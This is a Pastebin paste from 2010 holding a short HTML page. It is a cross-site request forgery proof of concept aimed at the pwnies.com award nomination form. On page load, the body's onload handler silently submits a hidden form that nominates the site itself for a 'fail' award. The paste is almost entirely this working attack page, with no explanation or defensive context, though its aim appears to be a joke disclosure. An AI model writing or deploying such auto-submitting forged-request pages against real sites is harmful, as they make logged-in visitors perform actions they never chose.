Advertisement
Guest User

Untitled

a guest
May 24th, 2010
354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. <html><head></head>
  2. <body onload="document.MyForm.submit();">
  3. <form name="MyForm" action="http://pwnies.com/nominations/nomination.php" method="post">
  4. <div>
  5. <input name="award" value="fail" type="hidden">
  6. <div class="input"><input class="text" name="name" value="Pwnies.com CSRF Vulnerability" type="hidden"></div>
  7. <input class="text" name="work" type="hidden">
  8. <input name="date" value="" type="hidden">
  9. <input class="text" name="description" value="Self evident vulnerability is self evident." type="hidden"></div>
  10. <input class="button" value="submit" type="submit">
  11. </div>
  12. </form>
  13. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement